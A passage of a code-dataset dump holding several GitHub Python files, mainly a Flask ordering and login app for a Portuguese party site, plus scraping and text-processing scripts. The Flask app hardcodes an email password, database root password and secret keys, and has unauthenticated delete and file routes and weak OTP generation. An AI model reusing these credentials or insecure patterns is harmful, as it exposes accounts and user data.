'Sec-Fetch-Dest': 'empty',\n# 'Referer': 'https://www.playstation.com/de-de/explore/playstation-now/playstation-now-spiele-katalog/',\n# 'Accept-Language': 'de-DE,de;q=0.9,ja-JP;q=0.8,ja;q=0.7,en-US;q=0.6,en;q=0.5,fr;q=0.4'\n }\n for i in range(0,99):\n payload = \"genre=&platform=&sorting=alphabetical&search=&ajax_action=filter_games&page_num=\" + str(i)\n try:\n response = requests.request(\"POST\", url, headers=headers, data = payload)\n except requests.exceptions.RequestException as e: # This is the correct syntax\n raise SystemExit(e)\n games = json.loads(response.text)\n if games['action_queue'][0][1]:\n games = games['action_queue'][0][1]['value']\n converter = bs2json()\n soup = BeautifulSoup(games, \"lxml\")\n\n for j in soup.findAll('div', class_=\"cc_psnow_game_item\"):\n for s in j.findAll('h3'):\n m = s.extract()\n extracter = converter.convert(m)\n gametitle = extracter['h3']['text']\n if j.find('img', alt=\"PS3\"):\n console = \"PS3\"\n elif j.find('img', alt=\"PS4\"):\n console = \"PS4\"\n elif j.find('img', alt=\"PS2\"):\n console = \"PS2\"\n print(gametitle+console)\n gamelist.writerow({'Game': gametitle,'Console': console, 'Until': 'TBD'})\n", "repo_name": "aickletfraid/PSNowGames", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "86", "api": [{"api_name": "csv.DictWriter", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 33, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "bs2json.bs2json", "line_number": 38, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "22226630431", "text": "\nfrom flask 
import Flask, session, Markup, Response\nfrom flask import request, render_template, url_for, redirect, flash, send_file\nfrom flask_mail import Mail, Message\nfrom datetime import datetime\nfrom passlib.hash import sha256_crypt\nimport warnings\n\nfrom dbconnect import connection\nfrom functools import wraps\nfrom werkzeug.utils import secure_filename\nimport os\nfrom flask import send_from_directory\nimport random\n\nimport math\n\nfrom autualizador import InsertSql, UpdateQuerySql, SelectSql, eventos\n\n\n\nmes = str(datetime.now().strftime(\"%b\"))\ndia = str(datetime.now().strftime(\"%d\"))\nhora = str(datetime.now().strftime(\"%H:%M:%S\"))\n\nnum_Os = []\nuser_online = []\napp = Flask(__name__)\n\nmail_settings = {\n    'MAIL_SERVER': 'smtp.gmail.com',\n    'MAIL_PORT': 465,\n    'MAIL_USE_TLS':False,\n    'MAIL_USE_SSL': True,\n    'MAIL_USERNAME':'rafael.figueiradafoz@gmail.com',\n    'MAIL_PASSWORD': 'ttvjkembddcfqjxs'\n\n}\n\napp.config.update(mail_settings)\n\nmail = Mail(app)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:rootpass@localhost/festa_facil'\n\nUPLOAD_FOLDER = './static/uploads/'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\napp.config['WTF_CSRF_ENABLED'] = True\napp.config['SECRET_KEY']='my_love_dont_try'\n\n\n############ HELPER METHODS ####################\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n#\n# def invoice(f):\n#     @wraps(f)\n#     def wrap(*args, **kwargs):\n#         if 'invoice' in session:\n#             return f(*args, **kwargs)\n#         else:\n#             flash(\"Nao possui nenhum pedido\")\n#             return redirect(url_for('dashboard'))\n#     return wrap\n#\n#\n\n\n\n\n\n\n\n\ndef login_required(f):\n    @wraps(f)\n    def wrap(*args, **kwargs):\n        if 'logged_in' in session:\n            return f(*args, **kwargs)\n        else:\n            flash(\"Precisa fazer o Login\")\n            return redirect(url_for('index'))\n    return wrap\n\n\n\n\n############ HELPER METHODS ####################\n\n\n\n\ndef check_user_Login(login):\n    try:\n        c,conn = connection()\n        x = c.execute(\"SELECT * FROM usuarios WHERE LOGIN=%s\", (login,))\n        if int(x) > 0:\n            myresult = c.fetchall()\n            return myresult\n        if int(x) == 0:\n            return False\n    except Exception as e:\n        print(f' ERROR: {str(e)}')\n        return (str(e))\ndef check_user_ID(id):\n    try:\n        c,conn = connection()\n        x = c.execute(\"SELECT * FROM usuarios WHERE id_usuario=%s\", (id,))\n        if int(x) > 0:\n            myresult = c.fetchall()\n            return myresult\n        if int(x) == 0:\n            return False\n    except Exception as e:\n        print(f' ERROR: {str(e)}')\n        return (str(e))\n\n\ndef generateOTP():\n    # Declare a string variable\n    # which stores all string\n    string = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n    OTP = \"\"\n    length = len(string)\n    for i in range(6):\n        OTP += string[math.floor(random.random() * length)]\n    return OTP\n\n\n\ndef ADD_pontos(pontos, id):\n    user = SelectSql('usuarios','id_usuarios',id)\n    for x in user:\n        add = int(x[6]) + int(pontos)\n        UpdateQuerySql({'PONTOS':add},'usuarios','id_usuarios',id)\n\n\n\n############ INDEX ####################\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n    try:\n        festas = SelectSql('eventos','STATUS', 'OK')\n        links = SelectSql('instagram','STATUS', 'OK')\n        print(festas)\n\n        return render_template('index.html', festas=festas, links=links)\n    except Exception as e:\n        print(f' ERROR: {str(e)}')\n        return (str(e))\n\n\n\n\n\n# ############ DIRECT ROUTES ####################\n@app.route('/logout/', methods=['GET', 
'POST'])\n@login_required\ndef logout():\n session.clear()\n flash('Voce esta saindo do APP! Obrigado','logout')\n return redirect(url_for('index'))\n@app.errorhandler(404)\ndef pag_not_found(e):\n return render_template(\"404.html\")\n\n\n ##### DASHBOARD #####\n@app.route('/dashboard/', methods=['GET', 'POST'])\n@login_required\n\ndef dashboard():\n delyvery_list = []\n realizado_list = []\n id = session['ID_User']\n user = SelectSql('usuarios', 'id_usuarios',id)\n pedidos = SelectSql('invoice', 'id_usuarios',id)\n for p in pedidos:\n status = p[5]\n\n if status == 'A ENTREGAR':\n delyvery_list.append(status)\n if status == 'REALIZADO':\n realizado_list.append(status)\n\n\n to_delivery = len(delyvery_list)\n realizados = len(realizado_list)\n n_pedidos = len(pedidos)\n # print(to_delivery)\n\n\n return render_template('dashboard.html', user=user[0], pontos=user[0][6],\n invoice = pedidos, pop_pedidos= n_pedidos,\n to_delivery=to_delivery, realizados=realizados)\n\n\n\n\n# @app.route('/page_forgot_password', methods=['GET', 'POST'])\n# def email_forgot():\n# return render_template('redirect.html')\n\n\n@app.route('/pedidos_promo', methods=['GET', 'POST'])\ndef pedidos_promo():\n\n return render_template('pedidos_promo.html')\n\n\n@app.route('/transfer/<filename>', methods=['GET', 'POST'])\ndef uploaded_file(filename):\n if filename == None:\n filename = 'teste'\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n\n\n\n\n############ ROTAS LOGIN / DASHBOARD ####################\n\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n error = ''\n try:\n if request.method == 'POST':\n\n if request.form['POP_UP'] == 'pedidos_promo':\n email = request.form['EMAIL']\n password = request.form['PASSWORD']\n check_user = SelectSql('usuarios', 'LOGIN', email)\n page_url = request.form['POP_UP']\n\n if check_user == False:\n flash(\"Login ou Senha Errada, confira e tenta novamente\", 'erro')\n\n return redirect(url_for(page_url))\n else:\n for person in check_user:\n id = person[0]\n check_password = person[4]\n nome = person[1]\n apelido = person[2]\n end = person[7]\n if sha256_crypt.verify(password, check_password):\n session['logged_in'] = True\n session['email'] = email\n session['Completo'] = f'{nome} {apelido}'\n session['Nome'] = f'{nome}'\n session['ID_User'] = id\n session['delivery'] = end\n print('certo')\n\n return redirect(url_for(page_url))\n\n else:\n print('senha erro')\n flash(\"Login ou Senha Errada, confira e tenta novamente\", 'erro')\n return redirect(url_for(page_url))\n else:\n email = request.form['EMAIL']\n password = request.form['PASSWORD']\n check_user = SelectSql('usuarios', 'LOGIN', email)\n\n if check_user == False:\n flash(\"Login ou Senha Errada, confira e tenta novamente\", 'erro')\n\n return redirect(url_for('index'))\n else:\n for person in check_user:\n\n id = person[0]\n check_password = person[4]\n nome = person[1]\n apelido = person[2]\n end = person[7]\n if sha256_crypt.verify(password, check_password):\n session['logged_in'] = True\n session['email'] = email\n session['Completo'] = f'{nome} {apelido}'\n session['Nome'] = f'{nome}'\n session['ID_User'] = id\n session['delivery'] = end\n print('certo')\n\n return redirect(url_for('dashboard'))\n\n else:\n print('senha erro')\n flash(\"Login ou Senha Errada, confira e tenta novamente\", 'erro')\n return redirect(url_for('index'))\n\n # if email == \"admin@admin.com\" and password == \"123456\":\n # session['admin'] = True\n #\n #\n #\n #\n # return 
redirect(url_for('dashboard'))\n #\n\n return render_template(\"index.html\", error=error)\n\n except Exception as e:\n # flash(e)\n return redirect(url_for('index'))\n\n\n\n\n\n############ ROTAS DE TRABALHO ####################\n\n\n\n#\n# ##### EMAIL FORGOT / TOKEN #####\n#\n#\n#\n# @app.route('/token/<string:email>', methods=['GET', 'POST'])\n# def token(email):\n# token = generateOTP()\n# print(token)\n# UpdateQuerySql({'OTP': token}, 'usuarios', 'EMAIL', email)\n# user = SelectSql('usuarios', 'LOGIN', email)\n# for item in user:\n# # id = item[0]\n# nome_completo = f'{item[3]} {item[4]}'\n# if __name__ == '__main__':\n# with app.app_context():\n# msg = Message(subject='Pedido de Nova Senha',\n# sender=app.config.get('MAIL_USERNAME'),\n# recipients=[email],\n# html=render_template('email_reply.html', token=token, user=nome_completo))\n# mail.send(msg)\n# flash('Verifique o seu e-mail, um novo código foi enviado.', 'login')\n# return render_template('insert_code.html', email=email)\n#\n# @app.route('/send_email_password', methods=['GET', 'POST'])\n# def index_mail():\n# email = request.form['email']\n# token = generateOTP()\n# print(token)\n# user = SelectSql('usuarios','LOGIN',email)\n# if user == False:\n# flash(f'Esse email não está cadastrado!!! Verifique se está correto o email {email}','erro')\n# return redirect(url_for('email_forgot'))\n# else:\n# UpdateQuerySql({'OTP': token}, 'usuarios', 'EMAIL',email)\n# for item in user:\n# nome_completo = f'{item[3]} {item[4]}'\n# if __name__ == '__main__':\n# with app.app_context():\n# msg = Message(subject='Código para alteração de password Guia Figueira da Foz',\n# sender=app.config.get('MAIL_USERNAME'),\n# recipients=[email],\n# html=render_template('email_reply.html',token=token, user=nome_completo))\n# mail.send(msg)\n# return render_template('insert_code.html', email=email)\n#\n#\n# @app.route('/confima_code', methods=['GET', 'POST'])\n# def confirma_code():\n# if request.method == \"POST\":\n# email = request.form['email']\n# code = request.form['code']\n# new_password = sha256_crypt.encrypt((str(request.form['new_password'])))\n# data = SelectSql('usuarios', 'LOGIN',email)\n# for item in data:\n# OTP = item[12]\n# if str(OTP) == str(code):\n# UpdateQuerySql({'PASSWORD':new_password}, 'usuarios','EMAIL',email)\n# flash('Senha Atualizada com Sucesso!', 'success')\n# return redirect(url_for('LoginClientes'))\n# else:\n# flash('Código não está correto, tente novamente', 'erro')\n# return render_template('insert_code.html',email=email)\n#\n#\n#\n# ####### REGISTER USUARIOS ##########\n\n#\n@app.route('/register', methods=['POST'])\ndef register():\n error = ''\n try:\n if request.method == 'POST':\n email = request.form['EMAIL']\n nome = request.form['NOME']\n apelido = request.form['SOBRENOME']\n check_user = SelectSql('usuarios', 'LOGIN', email)\n print(check_user)\n if check_user == False:\n password = sha256_crypt.encrypt((str(request.form['PASSWORD'])))\n # DATA = str(datetime.now().strftime(\"%b %d,%Y\"))\n myDict = {\n 'LOGIN': email,\n 'PASSWORD' : password,\n 'NOME' : nome,\n 'SOBRENOME' : apelido,\n 'NOTIFICACOES' : 0 ,\n 'PONTOS' : 0,\n 'DATA_INSCRICAO': f'{dia} {mes}',\n 'ENDERECO': False\n\n }\n InsertSql(myDict,'usuarios')\n user = SelectSql('usuarios', 'LOGIN',email)\n for item in user:\n id = item[0]\n session['logged_in'] = True\n session['email'] = email\n session['Completo'] = f'{nome} {apelido}'\n session['Nome'] = f'{nome}'\n session['ID_User'] = id\n session['delivery'] = False\n return 
redirect(url_for('dashboard'))\n else:\n flash('Usuário já cadastrado, escolha um email diferente', 'login')\n return redirect(url_for('index'))\n return redirect(url_for('index'))\n\n except Exception as e:\n flash(e)\n\n\n\n@app.route('/invoice_promo', methods=['GET', 'POST'])\ndef invoice_promo():\n from datetime import timedelta\n d = datetime.today()\n if request.method == \"POST\":\n for post in request.form:\n #### PEDIDO ####\n while d.weekday() != 4:\n d += timedelta(1)\n data_entrega = str(d)\n dia_entrega = data_entrega[8:10]\n mes_entrega = data_entrega[5:7]\n ano_entrega = data_entrega[0:4]\n entrega = f'{dia_entrega}/{mes_entrega}/{ano_entrega}'\n if post == 'ENDERECO':\n #### INSERT USER ENDERECO #####\n myDict_user = {'ENDERECO':request.form['ENDERECO'],\n 'APT':request.form['APT'],\n 'BAIRRO':request.form['BAIRRO'],\n 'CEP':request.form['CEP'],\n 'TELEFONE': request.form['TELEFONE'],\n }\n\n myDict_invoice = {'PEDIDO_1':request.form['PEDIDO_1'],\n 'PEDIDO_2':request.form['PEDIDO_2'],\n 'id_usuarios':request.form['ID'],\n 'DATA':f'{dia} {mes}',\n 'STATUS': 'A ENTREGAR',\n 'CATEGORIA':'PROMOCAO',\n 'ENTREGA':entrega}\n\n\n UpdateQuerySql(myDict_user,'usuarios','id_usuarios',request.form['ID'])\n InsertSql(myDict_invoice,'invoice')\n ADD_pontos(20, request.form['ID'])\n session['invoice'] = True\n session['delivery'] = True\n\n return redirect(url_for('dashboard'))\n else:\n myDict_invoice = {'PEDIDO_1': request.form['PEDIDO_1'],\n 'PEDIDO_2': request.form['PEDIDO_2'],\n 'id_usuarios': request.form['ID'],\n 'DATA': f'{dia} {mes}',\n 'STATUS': 'A ENTREGAR',\n 'CATEGORIA': 'PROMOCAO',\n 'ENTREGA':entrega}\n\n InsertSql(myDict_invoice, 'invoice')\n ADD_pontos(20, request.form['ID'])\n return redirect(url_for('dashboard'))\n return redirect(url_for('dashboard'))\n\n@app.route('/delete_invoice/<string:id_data>', methods = ['GET'])\ndef delete(id_data):\n print(id_data)\n c, conn = connection()\n c.execute(\"DELETE FROM invoice WHERE id_invoice=%s\", (id_data))\n conn.commit()\n conn.close()\n return redirect(url_for('dashboard'))\n\n\n\n# ############## CONFIGURACOES DE USUARIOS #################\n#\n# @app.route('/edit_profile_photo', methods=['GET', 'POST'])\n# def edit_profile_photo():\n# if request.method == \"POST\":\n# myDict = {}\n# if request.files['file']:\n# f = request.files['file']\n# print(f)\n# if f and allowed_file(f.filename):\n# filename = secure_filename(f.filename)\n# f.save(os.path.join(app.config['UPLOAD_FOLDER'], 'avatar'+filename))\n# myDict.update({'FOTO':'avatar'+filename})\n# UpdateQuerySql(myDict, 'usuarios','EMAIL',session['email'])\n# return redirect(url_for('dashboard'))\n#\n#\n# @app.route('/usuarios/', methods=['GET', 'POST'])\n# def usuarios():\n# c, conn = connection()\n# c.execute(\"SELECT * FROM usuarios\")\n# data = c.fetchall()\n# c.close()\n# return render_template('lista-Usuarios.html', usuarios=data )\n#\n#\n#\n# @app.route('/edit_usuario', methods=['GET', 'POST'])\n# def edit_usuario():\n# if request.method == \"POST\":\n# data = []\n# myDict = {}\n# for post in request.form:\n# data.append(post)\n# for form in data:\n# request_form = request.form[form]\n# print(request_form)\n# myDict.update({form: request_form})\n# if request_form == '':\n# request_form = \"blank\"\n# myDict.update({form: request_form})\n# else:\n# myDict.update({form: request_form})\n# print(myDict)\n# UpdateQuerySql(myDict, 'usuarios', 'EMAIL', session['email'])\n# return redirect(url_for('dashboard'))\n#\n#\n# @app.route('/delete/<string:id_data>', methods = 
['GET'])\n# def delete(id_data):\n# flash(\"Record Has Been Deleted Successfully\")\n# c, conn = connection()\n# c.execute(\"DELETE FROM usuarios WHERE id_usuario=%s\", (id_data,))\n# return redirect(url_for('usuarios'))\n#\n#\n\n\n\n\ndef main ():\n app.secret_key = 'IPA_Criolina_1980'\n port = int(os.environ.get(\"PORT\", 5002))\n app.run (host=\"0.0.0.0\", port=port)\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "raggaxe/criolina", "sub_path": "servidor.py", "file_name": "servidor.py", "file_ext": "py", "file_size_in_byte": 18179, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 28, "usage_type": "call"}, {"api_name": "flask_mail.Mail", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 88, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 82, "usage_type": "call"}, {"api_name": "dbconnect.connection", "line_number": 101, "usage_type": "call"}, {"api_name": "dbconnect.connection", "line_number": 113, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 132, "usage_type": "call"}, {"api_name": "random.random", "line_number": 132, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 138, "usage_type": "call"}, {"api_name": "autualizador.UpdateQuerySql", "line_number": 141, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 150, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.session.clear", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 182, "usage_type": "name"}, {"api_name": "autualizador.SelectSql", "line_number": 183, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 184, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 200, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 215, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 235, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 235, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 237, "usage_type": "attribute"}, {"api_name": 
"flask.request", "line_number": 237, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 238, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 238, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 239, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 239, "usage_type": "name"}, {"api_name": "autualizador.SelectSql", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 241, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 241, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 246, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 246, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt.verify", "line_number": 254, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt", "line_number": 254, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 255, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 257, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 258, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 259, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 260, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 267, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 270, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 270, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "autualizador.SelectSql", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 277, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 277, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt.verify", "line_number": 286, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt", "line_number": 286, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 287, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 288, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 289, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 290, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 291, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 292, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 299, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 300, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 300, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 311, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 315, "usage_type": "call"}, 
{"api_name": "flask.url_for", "line_number": 315, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 398, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 398, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 399, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 399, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 400, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 400, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 401, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 401, "usage_type": "name"}, {"api_name": "autualizador.SelectSql", "line_number": 402, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt.encrypt", "line_number": 405, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt", "line_number": 405, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 405, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 405, "usage_type": "name"}, {"api_name": "autualizador.InsertSql", "line_number": 418, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 419, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 422, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 423, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 424, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 425, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 426, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 427, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 428, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 428, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 430, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 431, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 431, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 432, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 432, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 435, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 442, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 442, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 443, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 443, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 444, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 444, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 447, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 455, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 455, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 456, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 456, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 457, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 457, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 458, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 458, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 459, "usage_type": 
"attribute"}, {"api_name": "flask.request", "line_number": 459, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 462, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 462, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 463, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 463, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 464, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 464, "usage_type": "name"}, {"api_name": "autualizador.UpdateQuerySql", "line_number": 471, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 471, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 471, "usage_type": "name"}, {"api_name": "autualizador.InsertSql", "line_number": 472, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 473, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 473, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 474, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 475, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 477, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 477, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 479, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 479, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 480, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 480, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 481, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 481, "usage_type": "name"}, {"api_name": "autualizador.InsertSql", "line_number": 487, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 488, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 488, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 489, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 489, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 490, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 490, "usage_type": "call"}, {"api_name": "dbconnect.connection", "line_number": 495, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 499, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 499, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 565, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 565, "usage_type": "attribute"}]} +{"seq_id": "27064786262", "text": "# import semantic\nimport string\nfrom nltk.corpus import stopwords\nstopw = list(set(stopwords.words('english')))\nstopw.extend(list(set(string.punctuation)))\nfrom phrasehandlingv3 import PhraseHandling\nphraseobj=PhraseHandling()\nimport json\ndata=json.load(open(\"MongoRelatedData\"))\n# sem_obj = semantic.Semantic()\nwords=[]\nfor ii,dd in enumerate(data):\n # print(ii, len(data))\n # print(d)\n # if d==\"associate consultant\":\n # print(1)\n allwords = []\n for d in dd:\n print(d)\n # try:\n pgr = phraseobj.phrases(d)\n pgr = list(set(pgr)-set(stopw))\n # semanticwords = sem_obj.semanticJobSearch(d, 0)\n #\n # for k, v in semanticwords.items():\n # for l in v:\n # if type(l)==dict:\n # if \"name\" in l:\n if len(pgr)>0:\n allwords.extend(pgr)\n # except:\n # pass\n\n allwords = 
list(set(allwords))\n if len(allwords)>0:\n words.append(allwords)\n # print(allwords)\nwith open(\"MongoRelatedData_words2\",\"w\") as f:\n json.dump(words,f)\n\n\n", "repo_name": "Prashantietedelhi/common", "sub_path": "src/extract_phrases.py", "file_name": "extract_phrases.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "nltk.corpus.stopwords.words", "line_number": 4, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 4, "usage_type": "name"}, {"api_name": "string.punctuation", "line_number": 5, "usage_type": "attribute"}, {"api_name": "phrasehandlingv3.PhraseHandling", "line_number": 7, "usage_type": "call"}, {"api_name": "json.load", "line_number": 9, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "8687935591", "text": "import os\nimport cv2\nimport glob\n\npath = \"D:/Private Studies/GRID dataset/s1.mpg_vcd/s1\"\nroot = glob.glob(\"{}/*.{}\".format(path, \"mpg\"))\nfor i in range(len(root)):\n vidcap = cv2.VideoCapture(root[i])\n success,image = vidcap.read()\n count = 0\n current_name, _ = os.path.splitext(os.path.basename(root[i]))\n file_path = \"{}/{}\".format(path, current_name)\n # print(file_path)\n if os.path.isdir(file_path) is False:\n os.mkdir(file_path)\n while success:\n 